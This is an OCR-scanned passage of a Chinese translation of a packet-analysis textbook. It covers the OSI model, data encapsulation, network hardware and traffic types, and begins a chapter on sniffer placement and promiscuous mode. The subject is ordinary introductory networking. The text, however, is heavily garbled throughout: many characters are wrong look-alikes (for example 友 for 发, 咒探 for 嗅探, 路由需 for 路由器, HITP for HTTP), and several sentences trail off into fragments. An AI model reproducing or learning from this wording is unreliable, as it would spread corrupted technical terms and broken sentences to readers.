| 注 喜 有 


在 讨论 我 们 的 工作 时 ， 一 位 同事 说 他 曾 处 理 过 一 位 用 户 的 投诉 ， 用 户 反映 不 能 访问 网 络 
资源 ， 而 实际 原因 是 用 户 输入 的 密码 不 正确 。 我 的 同事 将 这 个 案例 标 成 了 “第 8 层 的 问题 ”， 
II 通常 是 由 那些 整 天 工作 在 数据 包 层 次 上 的 网 络 工程 师 
门 所 使 用 。 





1.2.3 OSI 参考 模型 中 的 数据 流 回 


在 网 络 上 传输 的 初始 数据 育 先 从 传输 网 络 的 应 用 层 开 始 ， 沿 看 OSIi 
参考 模型 的 七 层 逐 层 向 下 ， 直 到 物理 层 。 在 这 一 层 传输 网 络 物理 媒介 会 
将 数据 友 壕 到 接收 系统 。 接 收 系 统 从 它 的 物理 层 获 取 到 传输 数据 ， 然 后 
癌 上 逐 层 处 理 ， 直 到 最 高 的 应 用 层 。 


OSI 模型 中 的 每 层 都 只 能 二 接 与 它 的 上 层 或 下 层 协议 通信 。 比 如 第 
二 层 只 能 从 第 一 层 和 第 三 层 中 发 送 或 接收 数据 。 


在 OSI 模型 任意 层 上 ， 由 不 同 协 议 提 供 的 服务 都 不 是 多 余 的 。 例 
如 ， 如 果 东 层 上 的 一 个 网 络 协议 握 供 了 一 种 服务 ， 那 么 其 他 任何 层 上 的 
协议 部 不 会 所 供与 之 完全 相同 的 服务 。 在 不 同 层 次 的 协议 可 能 有 类 似 目 
标的 功能 ， 但 它们 会 是 以 不 同 的 方式 来 实现 。 


在 对 应 层次 上 ， 友 过 和 接收 的 网 络 协 议 是 相互 配合 的 。 比 如 ， 友 达 
系统 在 第 7 层 的 菏 个 协议 负责 对 传输 数据 进行 编 但 封 芝 ， 那 么 往往 在 接 
收 系统 的 第 7 层 有 首相 应 的 网 络 协议 ， 负 贡 对 网 络 数据 进行 解 但 读 取 。 


图 1-2 中 连接 了 两 个 通信 端 ， 对 OSI 参考 模型 进行 了 网 形 化 的 说 明 。 
你 可 以 看 到 通信 数据 会 从 一 个 通信 痪 的 顶部 沉 同 撒 部 ， 然 后 当 它 到 达 万 


一 吉 信 端 时 ， 将 反问 从 后 部 流 同 项 部 。 


| Gl 

/EN /EN 

应 用 层 
表示 层 表示 层 
会 话 层 会 话 层 | 
网 络 层 
物理 层 


图 1-2 ”OSI 参考 模型 连接 两 个 通信 端的 图 形 表 示 
1.2.4 ”数据 封装 


OSI 参 考 模型 不 同 层次 上 的 协议 在 数据 封 竣 的 帮助 下 进行 通信 传 
得 。 协 议 栈 中 的 每 层 协议 都 负责 在 传输 数据 上 增加 一 个 协议 头 部 或 尾 
部 ， 其 中 包含 了 使 协议 栈 之 间 能 够 进行 通信 的 额外 信息 。 例 如 ， 妆 传输 
eS 
头 部 信息 数据 。 


数据 封 交 过 程 将 创建 一 个 协议 数据 单元 (PDU) ， 其 中 包括 正在 及 
类 的 网 络 数据 ， 以 及 所 有 增加 的 尖 部 与 尾部 协议 信息 。 随 看 网 络 数据 沿 
看 OSI 参考 模型 问 下 流动 ，PDU 逐 湖 变 化 、 增 长 ， 各 层 协议 均 将 其 头 部 
或 尾部 信息 浴 加 进 云 ， 下 到 物理 层 时 达到 其 了 最终 形式 ， 并 及 大 给 目标 计 
算 机 。 接 收 计算 机 收 a 到 PDU 后 ， 沿 看 OSI 参 考 柑 型 住 上 处 理 时 ， 逐 层 列 
A 
传输 数据 。 





OSI 参考 模型 使 用 特别 的 术语 来 描述 每 一 层 的 数据 。 物 理 层 叫 比 特 ， 数 据 链 路 层 叫 帆 ， 
网 络 层 叫 数 据 包 ， 传 输 层 叫 数 据 段 。 最 上 面 的 三 层 可 以 统称 数据 ， 但 这 些 叫 法 实际 上 用 得 并 
> 一 髓 会 使 用 报 文 来 表 不 一 个 元 到 或 部 分 PDU ， 该 PDU 从 多 个 OSI 参考 层 中 包含 了 
头 和 表 尾 信息 。 





让 我 们 通过 一 个 实际 的 例子 来 理解 数据 的 封装 过 程 ， 这 个 例子 摘 述 
了 数据 包 是 如 何在 OSI 参考 模型 中 被 创建 、 传 输 和 接收 的 。 作 为 数据 包 
分 析 师 ， 你 需要 了 人 解 ， 我 们 经 党 会 忽略 挥 会 话 层 和 表示 层 ， 所 以 它们 将 
不 会 在 这 个 例子 中 出 现 (包括 本 书 的 其 余部 分 ) 。 卫 | 

假设 这 样 一 个 情形 : 我 们 试看 在 计算 机 上 浏览 Google。 在 这 个 过 程 
中 ， 我 们 必须 首先 产生 一 个 请 求 数 据 包 ， 从 客户 内 计算 机 传输 到 目标 服 
务 占 上 。 这 里 我 们 假设 TCP/IP 通 信 会 话 已 经 锌 建立 ， 图 1-3 则 展示 了 此 
案例 中 的 数据 封装 处 理 过 程 。 


HT 应 用 层 HTTP 


| 
| 
[| nm TI rm 


图 1-3 ”客户 并 和 服务 占 之 间 数 据 封 六 过 程 图 示 


我 们 从 客户 病 计 算 机 的 应 用 层 开 始 ， 在 我 们 浏 帘 一 个 网 站 时 ， 所 使 
用 的 应 用 层 协议 是 HITP， 通 过 此 协议 发 出 请 求 命 令 ， 从 Google 下 载 
index.html 评 件 。 





Vy 
注意 





在 实践 中 ， 浏 贤 如 会 回 网 站 的 根 目录 文件 友 出 请 求 ， 通 第 使 用 正 斜 杠 (/) 来 表示 。 当 


Web 服 务 虱 接收 到 该 请 求 时 ， 它 会 根据 服务 占有 的 网 页 根 目录 设 定 对 浏览 右 重 定 同 。 根 日 录 文 
件 名 通常 是 index.html 或 index.php。 我 们 会 在 第 9 章 讨 论 更 多 有 关 HTTP 的 内 容 。 





应 用 层 协 议 发 送出 指令 后 ， 我 们 就 开始 关心 数据 包 是 如 何 被 发 送 到 
目的 地 的 。 数 据 包 中 的 应 用 层 数据 将 治 看 OSI 参考 模型 的 协议 栈 传递 给 
传输 层 。HTTP 是 一 个 使 用 TCP 〈 或 在 TCP 协 议 之 上 ) 的 应 用 层 协 议 ， 
此 传输 层 将 使 用 TCP 协 议 来 确保 数据 包 的 可 靠 投 递 。 一 个 包括 序列 志和 
其 他 数据 的 TCP 协 议 头 部 将 被 创建 ， 并 添加 到 PDU 中 ， 如 图 1-3 所 示 。 访 
TCP 表 头 包 含 了 序列 号 和 其 他 信息 ， 以 确保 数据 包 能 够 被 正确 交付 。 


| 主 喜 有 


我 们 常 说 一 个 协议 在 其 他 协议 之 上 ， 是 因为 OSI 参考 模型 的 分 层 设 计 。 例 如 HTTP 等 应 用 
层 协议 提供 了 一 个 特定 的 服务 ， 并 依靠 TCP 协 议 来 保证 服务 的 可 靠 交 付 。 正 如 你 学 习 到 的 ， 
DNS 协议 架构 于 UDP 之 上 ， 而 TCP 架 构 在 IP 之 上 。 





在 完成 这 项 工作 之 后 ，TCP 协 议 将 数据 包 交 给 IP 协 议 ， 也 就 是 在 第 
3 层 上 人 负 贡 为 数据 包 进 行 逆 辑 寻 址 的 协议 。IP 协 议 创 建 一 个 包含 有 地 和 罩 
寻 址 信息 的 头 部 ， 并 将 数据 包 传递 给 数据 链 路 层 上 的 以 太 网 协议 ， 然 后 
以 太 网 物理 地 址 会 被 沃 加 并 存储 在 以 太 网 师 关 中。 现在 数据 包 已 经 完全 
= 
入 。 


封 闻 好 的 数据 包 将 罕 越 网 络 线 统 ， 最 终 到 达 Google 的 Web 服 务 货 。 
Web 服 务 礁 开始 从 下 往 上 读 取 数据 包 ， 这 意味 痢 它 首先 读 取 数据 链 路 
层 ， 从 中 提取 到 所 包含 的 物理 以 太 网 寻 直 信息， 确定 数据 包 古 人 否 是 友 往 
这 人 台 服 务 帮 有 的。 一 旦 处 理 完 这 些 信息 ， 第 2 层 尖 部 与 尾部 的 信息 将 被 和 
除 ， 并 进入 到 第 3 层 的 信息 处 理 过 程 中 。 

第 3 层 IP 寻 址 信息 会 个 读 取 ， 以 便 确认 数据 包 被 正确 转 友 ， 以 及 数 
据 包 并 未 进行 分 请 处 理 。 这 些 信息 也 同样 被 剥 除 ， 并 区 到 下 一 层 进 行 处 
Th 


第 4 层 TCP 协 议 信 息 现 在 被 该 取 ， 以 确 傈 数据 包 和 是 按 序 到 达 的 。 然 
后 第 4 层 报 尖 信 息 被 剥离 ， 留 下 的 只 有 应 用 层 数据 。 这 些 数据 会 被 传 好 


到 Web 服 务 需 应 用 程序 。 为 了 啊 应 客户 疹 发 过 来 的 这 个 数据 包 ， 服 务 需 
应 该 发 回 一 个 TCP 确 认 数 据 包 ， 使 客户 问 知 道 它 的 请 求 已 经 被 接收 ， 并 
可 以 等 待 获取 index.html 文 件 内 容 了 。 


所 有 数据 包 都 会 以 这 个 例子 中 描述 的 过 程 进 行 创 建 和 处 理 ， 而 无 论 
使 用 的 古 哪 种 协议 。 


但 同时 ， 请 牢记 并 非 每 个 网 络 数据 包 痢 是 从 应 用 层 协议 产生 的 ， 所 
以 你 会 进一步 看 到 只 包 合 第 2 层 、 第 3 层 或 第 4 层 协议 信 息 的 数据 包 。 


1.2.5 ”网 络 硬件 


现在 是 时 候 来 看 一 看 网 络 硬 件 了 ， 至 此 脏 活 票 活 都 已 经 完成 ， 接 下 
来 的 内 容 都 很 简单 了 。 我 们 将 专注 于 几 个 较为 常见 的 网 络 硬件 : 集 线 
研 、 交 换 机 和 路 由 需 。 


1， 集 线 响 
集线器 一 般 是 提供 了 多 个 RJ-45 端 口 的 机 盒 ， 图 1-4 所 示 为 一 个 


NETGEAR 集 线 郁 。 集 线 右 从 非 钟 小 的 4 跨 口 的 设备 ， 到 企业 环境 中 安 凌 
机 染 设 计 的 48 妆 口 机 盒 设备 ， 变 化 很 大 。 


NETGEAR Sm a si Ds hig 


站 " 
! 站 再 他 = y 





图 1-4 一 个 典型 的 4 端口 以 太 网 集线器 
因为 集线器 产生 很 多 不 必要 的 网 络 流量 ， 并 仅 在 半 双 工 模式 下 运行 
(不 能 在 同一 时 间 发 送 和 接收 数据 ) ， 所 以 你 通常 不 会 在 现代 或 高 密度 
的 网 络 中 再 看 到 它们 的 身影 了 〈 用 交换 机 来 代替 ) 。 然 而 ， 你 应 该 知道 


集线器 的 工作 机 制 ， 因 为 它们 对 于 数据 包 分 析 技术 非常 重要 ， 特 别 是 在 
实施 我 们 将 于 第 2 章 介绍 的 “枢纽 "技术 时 。 


一 个 集 线 硕 无 非 承 是 工作 在 OSI 参考 模型 物理 层 上 的 转发 设备 。 写 
从 一 个 路口 接收 到 数据 包 ， 然 后 将 数据 包 传 输 〈 中 继 ) 到 设备 的 每 个 闹 
口上 。 例 如， 如 来 一 台 计 算 机 连接 到 一 个 4 亲口 集 线 带 的 1 写 病 口上 ， 般 
要 及 送 数据 到 连接 在 2 号 病 口 的 计算 机 ， 那 么 集 线 卉 将 会 把 数据 及 送 给 
痛 口 2、3、4。 连 搂 到 3 号 冯 口 与 4 吕 冰 口上 的 客户 病 计 算 机 通过 检查 以 
太 了 网 帆 头 字段 中 的 目标 并 体 访问 控制 《MAC) 地址， 判断 出 这 些 数据 
包 并 不 是 给 它们 的 ， 便 丢 径 这些 数据 包 。 


图 1-5 古 一 个 从 计算 机 A 发 送 数 据 到 计算 机 B 的 例子 ， 当 计算 机 A 友 
送出 数据 时 ， 所 有 连接 到 集线器 的 计算 机 都 将 接收 到 数据 ， 但 只 有 计算 
机 B 会 实际 将 数据 接收 下 来 ， 而 其 他 计算 机 则 将 丢 莽 它 。 


计算 机 B 





计算 机 D 





图 1-5 ”计算 机 A 通过 和 集 线 占 传输 数据 到 计算 机 B 的 通信 流 


作 一 个 比喻 ， 假 设 你 友 送 一 封 主题 为 "所 有 的 营销 人 员 请 注意 ”的 电 
了 于 邮件 给 贯 公 司 所 有 雇员 ， 而 不 是 只 有 那些 在 香 销 部 门 工作 的 人 。 市 场 
营销 部 门 的 员工 会 知道 这 封 邮 件 是 给 他 们 的 ， 他 们 很 可 能 会 打开 它 ， 而 
其 他 员工 看 到 这 封 邮件 并 不 是 给 他 们 的 ， 则 很 可 能 会 选择 丢弃。 可 以 看 
出 这 会 导 任 很 多 不 必要 有 的 通信 和 时 间 浪 费 ， 然 而 这 正 是 集 线 带 的 工作 原 
理 。 在 融 密 度 的 实际 网 络 中 ， 集 线 颖 最 好 的 丛 代 产品 十 交 换 机 ， 它 们 古 
文 持 全 双 工 的 设备 ， 可 以 同步 地 友 壕 和 接收 数据 。 


2. 交换 机 


与 集 线 郁 相同， 交换机 也 是 用 来 转 友 数据 包 的 。 但 与 集 线 硕 个 同 的 
是 ， 有 交换机 并 不 是 将 数据 广播 到 每 一 个 端口 ， 而 是 将 数据 友 壕 到 目的 计 
算 机 所 连接 的 病 口 上 。 如 同 你 在 如 图 1-6 中 看 到 的 那样 ， 有 交换 机 的 外 表 
与 集 线 右 十 分 相似 。 


市 场 上 几 个 大 牌 公司 的 交换 机 ， 比 如 思科 品牌 的 交换 机 ， 能 够 通过 
专业 化 的 供应 商 特定 软件 或 web 接口 进行 远程 管理 。 这 些 交 换 机 通常 被 
称 为 管理 型 交换机 。 管 理 型 交换机 提供 了 多 种 在 网 络 官 理 中 非常 有 用 的 
功能 特性 ， 包 括 月 用 或 共用 特定 闯 口 、 碍 看 痛 口 细节 参数 、 远 程 修 改 配 
置 、 远 程 重 局 等 。 





图 1-6 一 个 机 染 式 48 端 口 以 太 网 交换 机 


交换 机 在 处 理 传输 数据 包 时 ， 经 季 会 提供 一 些 先进 的 功能 。 为 了 能 
够 且 接 与 一 些 特定 设备 进行 通信 ， 交 换 机 必须 能 够 通过 MAC 地 址 来 唯 
一 标识 设备 ， 这 意味 看 它们 必须 工作 在 OSI 参 考 柑 型 的 数据 链 路 层 上 。 


交换 机 将 每 个 连接 设备 的 2 层 地 址 都 存储 在 一 个 CAM (Content 
Addressable Memory: 内 容 寻 址 寄存 左 ) 表 中 ，CAM 表 充当 看 一 种 类 似 
交通 警察 的 角色 。 当 一 个 数据 包 航 传输 时 ， 交 换 机 读 取 数据 包 中 的 第 2 
层 协议 头 部 信息 ， 并 使 用 CAM 表 作为 参考 ， 诀 定 往 哪个 或 哪些 端口 有 


图 1-7 说 明了 流量 经 过 交换 机 进行 传输 的 过 程 。 在 这 个 图 示 中 ， 计 
算 机 A 友 壕 数据 到 唯一 的 目标 : 计算 机 B， 虽 然 同 一 时 间 里 网 络 上 可 能 
有 很 多 会 证 ， 但 信息 将 会 耳 接 明 过 交换 机 和 目标 接收 者 进行 传输 ， 而 不 
会 被 传递 到 交换 机 和 所 有 连接 计算 机 之 间 。 


计算 机 B 





计算 机 C 





计算 机 D 


图 1-7 ” 当 计 算 机 A 通过 交换 机 传输 数据 到 计算 机 B 时 的 通信 流 图 示 


3. 路 由 天 


路 由 器 是 一 种 比 交 换 机 或 集线器 具有 更 高 层次 功能 的 先进 网 络 设 
备 。 一 个 路 由 器 可 以 有 许多 种 不 同 的 形状 和 外 形 ， 但 大 多 数 路 由 器 在 正 
前 方 的 面板 上 会 有 几 个 LED 指 示 灯 ， 在 背 板 上 会 有 一 些 网 络 端口 ， 个 数 
则 取决 于 网 络 的 大 小 。 图 1-8 显 示 了 一 款 路 由 器 的 外 形 。 
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图 1-8 一 丈 低 闹 的 Enterasys 路 由 如 ， 适 合 在 一 个 中 小 型 网 络 使 用 


路 由 器 工作 在 OSI 参考 模型 的 第 3 层 ， 它 们 负责 在 两 个 或 多 个 网 络 之 
间 转 发 数据 包 。 路 由 器 在 网 络 间 引导 数据 包 的 流 同 ， 这 一 过 程 被 称 为 路 
由 。 几 种 不 同类 型 的 路 由 协议 定义 了 不 同 目的 的 数据 包 如 何 被 路 由 到 其 
他 网 络 。 路 由 器 通常 使 用 第 3 层 地 址 〈 如 IP 地 址 ) 来 唯一 标识 网 络 上 的 


设备 。 


为 了 更 清楚 地 解释 路 由 的 概念 ， 我 们 以 一 个 拥有 几 条 街道 的 街区 进 
行 类 比 。 假 设 有 一 些 房子 ， 它 们 剖 有 看 上 自己 的 地 址 ， 整 像 网 络 上 的 计算 
机 一 样 ， 而 每 条 街道 融 如 同 网 段 ， 如 图 1-9 所 示 。 从 你 所 在 街道 上 的 东 
个 房子 ， 你 可 以 很 容易 地 与 同一 街 站 中 居住 的 邻 导 进行 沟通 交流， 这 类 
似 于 交换机 的 操作 ， 能 够 允许 在 同一 网 段 中 的 所 有 计算 机 进行 相互 通 


一 
信 。 


然而 ， 与 其 他 街道 上 居住 的 邻 大 进行 沟 退 交流 ， 束 像 是 与 不 同 网 段 
中 的 计算 机 进行 通信 。 参 照 图 1-9， 假 设 你 住 在 膝 街 503 写 ， 雷 要 到 山椒 
砚 蔡 202 与 。 如 果 想 要 过 去 ， 你 必须 先 到 橡树 街 ， 然 后 再 到 山 采 贡 堆 。 
现在 请 对 应 到 跨越 网 段 的 场景 中 ， 如 果 在 192.168.0.3 地 址 的 设备 需要 和 
192.168.0.54 地 址 的 设备 进行 通信 ， 它 必须 经 由 路 由 器 到 10.100.1.1 网 络 
上 ， 然 后 再 经 过 连接 目的 网 段 的 路 由 右 ， 才 可 以 到 达 目 标 网 段 。 


网 络 上 的 路 由 右 的 数量 与 大 小 通 第 取决 于 网 络 的 规模 与 功能 。 个 人 
和 家 性 办 公 网 络 可 能 只 需要 一 个 放置 在 网 络 中 心 的 小 型 路 由 如 。 而 大 型 
企业 网 络 则 可 能 有 几 个 路 由 带 分 布 在 不 同 的 部 门 ， 它 们 都 连接 到 一 个 大 
型 的 中 央 路 由 硕 或 三 层 区 换 机 上 《有 共有 内 症 功 能 ， 可 以 充当 一 台 路 由 需 
的 先进 型 交换 机 》。 
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图 1-9 一 个 路 由 网 络 与 街区 的 类 比 


当 你 开始 俘 看 越 来 越 多 有 的 网 络 图 时 ， 束 会 更 加 了 解 网 络 数据 法 是 如 
何 流 经 这 些 不 同类 型 的 网 络 设备 太 扣 有 的 ， 图 1-10 显 示 了 路 由 网 络 中 的 一 
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个 很 名 见 的 布局 形式 。 在 这 个 例子 中 ， 两 个 单独 的 网 络 通过 一 个 路 由 闪 
进行 连接 。 如 末了 网 络 A 上 的 计算 机 希望 与 网 络 B 上 计算 机 进行 通信 ， 则 
传输 数据 将 必须 通过 路 由 页。 


Network A Network B 


计算 机 B 计算 机 X 





计算 机 Y 


计算 机 C 计算 机 Z 


图 1-10 “计算 机 A 通 过 路 由 器 将 数据 传送 到 计算 机 X 的 通信 流 图 示 
J 国 . AN >》 
1.3 流量 分 次 


网 络 流量 可 以 分 为 3 大 类 : 广播 、 组 播 和 单 播 。 每 个 分 类 都 具有 不 
同 的 特点 ， 决 定 看 这 一 类 的 数据 包 访 如何 通 过 网 络 人 硬件 进行 处 理 。 


1.3.1 广播 流量 


广播 数据 包 会 被 发 送 到 一 个 网 段 上 的 所 有 端口 ， 而 不 管 这 些 端 口 连 
接 在 集 线 套 还 是 交换 机 上 。 但 并 非 所 有 的 广播 法 量 都 是 通过 相同 方式 构 
建 的 ， 而 是 包括 第 2 层 广播 流量 和 第 3 层 广 播 流 量 两 种 主要 形式 。 例 如 ， 
在 第 2 层 ，MAC 地 址 FF:FF:FF:FF:FF:FF 是 保留 的 广播 地 址 ， 任 何 发 送 到 
这 一 地 址 的 流量 都 将 会 被 三 播 到 整个 网 段 。 第 3 层 也 有 关 一 些 特定 的 广 
播 地 址 。 

在 一 个 IP 网 络 范围 中 最 大 的 IP 地 址 是 被 保留 作为 广播 地 址 使 用 的 。 


例如 ， 在 一 个 配置 了 192.168.0.XXX 的 IP 范 围 ， 子 网 掩 码 是 255.255.255.0 
的 地 址 网 络 中 ， 广 播 IP 地 址 是 192.168.0.255。 


在 通过 多 个 集 线 融 或 交换 机 连接 多 种 并 介 的 大 型 网 络 中 ， 广 播 数据 
包 将 从 一 个 交换 机 一 耳 被 中 继 到 为 一 交换 机 上 ， 从 而 传输 到 网 络 连 接 的 
所 有 网 段 上 。 广 播 数 据 包 能 够 到 达 的 区 域 彼 称 为 “六 播 域 ”， 也 驳 是 任意 
计算 机 可 以 不 用 经 由 路 由 器 即 可 和 其 他 计算 机 进行 直接 传输 的 网 段 范 
围 。 儿 1-11 显 示 了 一 个 小 型 网 络 上 存在 两 个 广播 域 的 例子 。 因 为 每 个 广 
播 域 会 一 下 延伸 到 路 由 硕 ， 所 以 广播 数据 包 只 在 它 特 定 的 广播 域 中 流 


通 。 





图 1-11 一 个 广播 域 一 直 延 伸 到 路 由 器 后 面 的 网 段 


我 们 前 面 的 类 比 也 能 很 好 地 说 明 广 播 域 是 如 何 工作 的 。 你 可 以 将 一 
个 广播 域 息 象 成 一 条 街道 。 如 末 你 站 在 家 门口 叫喊 ， 只 有 街道 上 的 人 才 
能 够 听 到 你 的 声音 。 而 如 条 你 想 与 不 同 街 让 上 的 人 说 话 ， 那 么 你 需要 找 
A 


1.3.2 ”组 播 流量 


组 播 羡 一 种 将 单一 来 源 数据 包 同 时 传输 给 多 个 目标 的 通信 方式 。 组 
播 的 目的 是 简化 这 个 过 程 ， 并 使 用 尽 可 能 少 的 网 络 市 宽 。 组 播 汽 量 通 过 
如 倪 数 据 包 的 大 量 复 制 来 达到 优化 效果 ， 而 对 组 播 流量 的 处 兽 方 式 则 噩 
及 依赖 于 不同 网 络 协 议 的 实现 细 市 。 


实施 组 播 的 主要 方法 是 通过 一 种 将 数据 包 接 收 者 加 入 组 播 组 的 编 址 
方案 实现 的 ， 这 也 是 IP 组 播 的 工作 原理 。 这 种 编 址 方 条 确 人 数据 包 不 会 


被 传送 到 未 预期 的 目的 地 。 事 实 上 IP 协 议 将 一 整 段 的 地 址 都 用 于 组 播 ， 
如 果 你 在 网 络 上 看 到 224.0.0.0 一 239.255.255.255 的 卫 地 址 ， 那 么 它 很 有 
可 能 就 是 组 播 流 量 。 


1.3.3 ” 单 播 流量 


单 播 数 据 包 会 从 一 台 计 算 机 直接 传输 到 为 一 从 计算 机 。 单 播 机 制 的 
其 体 实 现 方 式 取决 于 使 用 的 协议 。 例 如 ， 一 台 设 备 布 望 与 一 个 Web 服 务 
研 进 行 通信 ， 这 便 是 一 个 病 到 病 的 连接 ， 所 以 通信 过 程 将 由 客户 病 设 备 
ii 
型 例子 。 


1.4 ”小结 


本 草 渭 者 了 学 习 数 据 包 分 析 拉 术 所 必须 掌握 的 基础 知识 。 在 开始 解 
次 网 络 故 障 问 题 之 前 ， 你 必须 明日 网 络 通信 到 弃 是 怎么 回 事 。 在 第 2 章 
中 ， 我 们 将 基于 这 些 概念 ， 来 讨论 更 扁 级 的 网 络 通 信 准 则 。 





[1] TCP/IP 模 型 中 并 没有 会 话 层 和 表示 层 ， 因 此 在 实际 的 TCP/IP 协 议 栈 
中 ， 并 没有 单独 设计 会 话 层 和 表示 层 网 络 协 议 。 一 一 译 者 注 


太太 


第 2 章 ”监听 网 络 线路 





进行 局 效 的 数据 包 分 析 的 一 个 关键 决 案 是 在 哪里 放置 数据 包 趾 探 
厂 ， 以 恰当 地 捕捉 网 络 数据 。 数 据 包 分 析 师 通 币 把 这 个 过 程 称 为 监听 网 
络 线路 。 位 而 谨 之 ， 这 是 将 数据 包 咒 探 右 安 置 在 网 络 上 恰当 物理 位 置 的 


J es 


然而 不 幸 的 是 ， 嗅 探 数据 包 并 不 像 是 将 一 台 笔 记 本 电脑 连 入 网 络 那 
么 简单 。 事 实 上 ， 有 些 时 候 ， 在 网 络 布线 系统 上 放置 一 个 数据 包 噢 探 
器 ， 要 比 实际 分 析 数 据 包 更 难 一 些 ， 


安置 品 探 莫 的 挑战 是 要 孝 虑 到 种 类 索 多 的 用 来 连接 网 络 的 价 件 设 
备 。 图 2-1 显 示 了 一 种 典型 的 情况 。 由 于 网 络 上 主要 的 3 种 设备 《〈 集 线 
独 、 交 换 机 、 路 由 上 莫 ) 对 网 络 流 量 的 处 理 方式 部 不 相同 ， 因 此 你 必须 非 
凋 消 楚 你 所 分 析 网 络 使 用 的 是 哪些 人 硬件 设备 。 


本 章 的 目标 是 帮助 你 理解 如 何在 各 种 不 同 网 络 拓扑 结构 中 安置 数据 
包 串 探 融 。 肖 完 ， 让 我 们 来 看 一 看 ， 我 们 实际 上 是 如 何 捕获 网 络 线路 上 
所 有 传 饮 的 数据 包 的 。 





图 2-1 将 嗅 探 器 安置 在 你 的 网 络 上 ， 有 时 是 你 面 对 的 最 大 挑战 


2.1 混杂 模式 


你 需要 一 个 文 持 混 洒 模 式 驱动 有 的 网 卡 ， 才 可 能 在 网 络 上 咒 探 数据 
包 。 泥 洒 柑 式 十 什么 呢 ? 实 际 上 它 古 一 种 允许 网 卡 能 够 伍 看 到 所 有 流 经 
网 络 线路 数据 包 的 驱动 柑 式 。 


正如 你 在 第 1 章 了 解 到 的 那样 ， 由 于 在 网 络 上 有 一 类 广播 流量 ， 因 
此 对 于 客户 端 来 说 ， 接 收 到 并 非 以 它们 的 地 址 作为 日 标的 数据 包 是 很 常 
见 的 。 用 来 对 给 定 IP 地 址 解析 对 应 MAC 地 址 的 ARP 协 议 〔( 在 任何 网 络 上 
都 是 一 个 关键 组 成 部 分 ) 便 是 一 个 很 好 的 例子 ， 它 能 够 说 明 有 些 网 络 流 
量 并 非 是 发 送 到 指定 的 日 标 地 址 。 为 了 找到 对 应 的 MAC 地 址 ，ARP 协 
议会 发 送 一 个 厂 播 包 发 出 到 广播 域 中 的 每 个 人 设备， 然后 期 户 正 确 的 客户 
闹 将 做 出 回应 。 


一 个 广播 域 〈 也 融 是 一 个 网 络 段 ， 其 中 任何 一 合计 算 机 都 可 以 无 须 
经 过 路 由 硕 ， 直 接 传送 数据 到 记 一 合计 算 机 ) 是 由 几 台 计算 机 组 成 的 ， 
但 广播 域 中 仅仅 只 有 一 台 客 户 姗 应 该 对 传输 的 ARP 广 播 请 求 包 感 兴趣 。 
而 一 旦 网 络 上 的 每 合计 算 机 者 处理 和 回应 ARP 广 播 包 的 话 ， 那 么 网 络 的 
性 能 将 变 得 非 弟 的 粮 料 。 


办 此， 其 他 网 络 设备 上 的 网 卡 驱动 会 识 列 出 这 个 数据 包 对 于 它们 来 
襄 没 有 任何 用 处 ， 于 是 选择 将 数据 包 丢 和 并， 而 不 是 传 饮 给 CPU 进行 处 
理 。 将 目标 不 是 这 合 接收 主机 的 数据 包 进 行 丢 并 可 以 喧 赦 地 提高 网 络 处 
理性 能 ， 但 这 对 数据 包 分 析 师 来 说 并 不 是 个 好 消息 。 作 为 分 析 师 ， 我 们 


通 昭 需要 看 到 线路 上 传输 的 每 一 个 数据 包 ， 这 样 我 们 才 不 用 担心 会 丢失 
掉 任何 关键 的 信和 号 。 


我 们 可 以 使 用 网 卡 的 温 末 模式 来 确保 能 够 捕获 所 有 有 的 网 络 流 量 。 一 
旦 工作 在 混杂 人 蛋 式 下 ， 网 卡 将 会 把 每 一 个 它 所 看 到 的 数据 包 都 传递 给 主 
机 的 处 理 器 ， 而 无 论 数据 包 的 目的 地 址 是 什么 。 一 旦 数据 包 到 达 CPU， 
它 束 可 以 被 一 个 数据 包 咒 探 软 件 捕获 并 进行 分 析 。 


现在 的 网 卡 一 般 都 文 持 混杂 模式 ，Wireshark 软 件 包 中 也 包含 了 
libpcap / WinPcap 驶 动 ， 这 让 你 能 够 很 方便 地 在 Wireshark 软 件 界 面 上 残 
将 网 卡 和 直接 切换 到 混杂 模式 上 。 我们 将 在 第 3 章 里 介绍 更 多 的 libpcap / 
WinPcap 的 内 容 。) 


为 了 学 习 本 书 中 的 数据 包 分 析 技 术 ， 你 必须 要 有 一 个 文 持 使 用 混杂 
模式 的 网 卡 与 操作 系统 。 在 你 只 想 看 到 友 往 你 运行 品 探 软件 主机 MAC 
地 址 的 网 络 数据 包 的 时 候 ， 束 不 需要 以 混 林 模式 来 进行 品 探 了 。 
| 注意 有 


在 大 多 数 操作 系统 (包括 Windows) 上 ， 要 想 使 用 一 个 混杂 模式 的 网 卡 ， 你 就 必须 要 所 





升 用 尸 权 限 到 害 理 员 级 别 。 如 来 你 不 能 在 一 个 系统 上 合法 地 获得 这 些 权 限 ， 那 就 不 应 该 在 这 
台 系 统 上 对 所 在 网 络 进 行 任何 方式 的 数据 包 虽 探 。 





2.2 ”在 集 线 可 连接 网 络 中 咒 探 


在 使 用 集 线 占 连接 的 网 络 中 进行 品 探 ， 对 于 任何 数据 包 分 析 师 来 
说 ， 虱 是 一 个 梦想 。 正 如 你 在 第 1 革 中 了 解 到 的 那样 ， 流 经 集 线 占 的 所 
有 网 络 数据 包 虱 会 补 友 达到 每 一 个 集 线 副 连接 的 曾 口 。 因 此 ， 要 想 分 析 
一 全 连接 到 集 线 左 上 的 计算 机 的 网 络 通 信 ， 你 所 需要 做 的 所 有 事情 瓯 是 
将 数据 包 唱 探 右 连接 到 集 线 强 的 任意 一 个 空 用 闹 口 上 。 这 样 你 惑 能 看 到 
所 有 从 那 台 计算 机 流入 流出 的 网 络 通信 ， 以 及 其 他 接 入 集 线 右 的 所 有 计 
算 机 之 间 的 通信 。 


如 图 2-2 所 示 ， 当 你 的 别 探 蓓 连接 到 一 个 集 线 大 网络 时 ， 你 对 本 地 
网 络 的 可 视 范 围 是 不 受 限 制 的 。 


NE 





可 视 范 围 ， 这 个 术语 将 在 整 本 书 的 很 多 图 示 中 显示 ， 表 示 你 在 数据 包 咒 探 右 中 能 够 看 到 
通信 流量 的 主机 范围 。 





然而 对 我 们 来 说 不 竺 的 消息 是 ， 集 线 套 网 络 已 经 是 非 钟 军 见 的 了 ， 
因为 它们 曾经 给 网 络 官 理 员 们 市 来 了 很 大 的 困扰 ， 而 且 已 经 航 基 本 淘 庆 
了 。 因 为 在 集 线 磺 网 络 中 ， 在 任意 时 刻 里 ， 只 有 一 个 设备 可 以 通信 。 
此 ， 通 过 集 线 帮 连接 的 设备 必须 与 其 他 设备 进行 范 争 ， 才 能 取得 市 宽 ; 
